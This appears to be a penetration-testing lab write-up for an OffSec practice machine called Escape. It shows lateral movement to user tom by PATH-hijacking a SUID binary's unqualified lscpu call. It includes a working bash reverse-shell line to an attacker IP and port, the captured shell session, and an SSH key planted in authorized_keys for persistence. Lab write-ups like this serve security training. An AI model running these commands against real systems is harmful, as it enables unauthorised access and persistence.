InfoSec LAB

Escape_OffSec_Lateral_Movement_tom

Created: 4 min read

tom

There is a custom SUID binary, /usr/bin/logconsole, that has some commands baked into it with their absolute path, except for the lscpu command, which is invoked without specifying its full path.

This means that the system relies on the PATH environment variable to locate and execute lscpu. As a result, an attacker can potentially exploit this by modifying the PATH variable to prioritize a malicious version of lscpu in a directory they control. This technique, known as path hijacking, allows for the execution of arbitrary code whenever lscpu is called, potentially leading to privilege escalation or other security risks.

Debian-snmp@escape:/var/tmp$ echo -n 'bash -c "bash -i >& /dev/tcp/192.168.45.153/4444 0>&1"' > /var/tmp/lscpu; chmod 755 /var/tmp/lscpu

Setting up a malicious lscpu and make it accessible by anyone

Debian-snmp@escape:/var/tmp$ export PATH=/var/tmp:$PATH

Altering the current PATH variable to start with the /var/tmp directory

Debian-snmp@escape:/var/tmp$ /usr/bin/logconsole
/usr/bin/logconsole
 
 
 /$$                                                                       /$$          
| $$                                                                      | $$          
| $$  /$$$$$$   /$$$$$$   /$$$$$$$  /$$$$$$  /$$$$$$$   /$$$$$$$  /$$$$$$ | $$  /$$$$$$ 
| $$ /$$__  $$ /$$__  $$ /$$_____/ /$$__  $$| $$__  $$ /$$_____/ /$$__  $$| $$ /$$__  $$
| $$| $$  \ $$| $$  \ $$| $$      | $$  \ $$| $$  \ $$|  $$$$$$ | $$  \ $$| $$| $$$$$$$$
| $$| $$  | $$| $$  | $$| $$      | $$  | $$| $$  | $$ \____  $$| $$  | $$| $$| $$_____/
| $$|  $$$$$$/|  $$$$$$$|  $$$$$$$|  $$$$$$/| $$  | $$ /$$$$$$$/|  $$$$$$/| $$|  $$$$$$$
|__/ \______/  \____  $$ \_______/ \______/ |__/  |__/|_______/  \______/ |__/ \_______/
               /$$  \ $$                                                                
              |  $$$$$$/                                                                
               \______/                                                                 
 
                                                                                                                                         
1. About the Sytem
2. Current Process Status
3. List all the Users Logged in and out
4. Quick summary of User Logged in
5. IP Routing Table
6. CPU Information
7. To Exit 
99. Generate the Report 
 
Enter the option ==> 6
6

Executing the SUID binary and selecting the option 6 to invoke the lscpu command

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.153] from (UNKNOWN) [192.168.122.113] 45148
tom@escape:/var/tmp$ whoami               whoami
whoami
tom
tom@escape:/var/tmp$ hostname             hostname
hostname
escape
tom@escape:/var/tmp$ ip a                 ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:7e:d3:9c:0e brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:7eff:fed3:9c0e/64 scope link 
       valid_lft forever preferred_lft forever
5: vethe544e37@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default 
    link/ether 92:34:d7:75:cf:89 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::9034:d7ff:fe75:cf89/64 scope link 
       valid_lft forever preferred_lft forever
6: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:76:59 brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.113/24 brd 192.168.122.255 scope global ens192
       valid_lft forever preferred_lft forever

Lateral Movement made to the escape host as the tom user via PATH hjjacking a SUID binary

tom@escape:/home/tom$ mkdir -p ~/.ssh; echo mkdir -p ~/.ssh; echo -n 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' > ~/.ssh/authorized_keys
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/escape_offsec]
└─$ ssh tom@$IP              
Enter passphrase for key '/home/kali/.ssh/id_ed25519': 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-124-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
 
 System information disabled due to load higher than 1.0
 
 
 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
 
14 packages can be updated.
10 updates are security updates.
 
 
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
$

Upgrading the shell to SSH

Interactive Graph View

Backlinks